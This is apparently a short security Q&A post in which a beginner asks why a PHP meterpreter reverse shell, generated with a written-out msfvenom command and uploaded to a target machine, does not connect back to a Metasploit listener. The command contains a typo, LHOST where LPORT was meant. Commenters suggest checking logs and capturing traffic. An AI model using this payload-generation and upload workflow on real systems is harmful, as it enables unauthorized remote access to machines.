# PHP reverse shell is not responding back

Tags: php, metasploit, reverse-shell

I created a php reverse shell using msfvenom utility like:

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=<MY_IP> LHOST=4444 -f raw > reverse_shell.php
```

And I created a listener using msfconsole using `multi/handler`. I uploaded the shell to the target machine and used `curl` to request the url of the uploaded shell but the listener is not showing any response. Any suggestions?

Comment: You need to start a basic troubleshooting process to confirm what is working and what isn't. Is the php getting executed? Is it launching a shell but it's getting blocked by a firewall? etc. etc.

Comment: How do I do that? please help i am new

Comment: You need to look at logs and perform a traffic capture.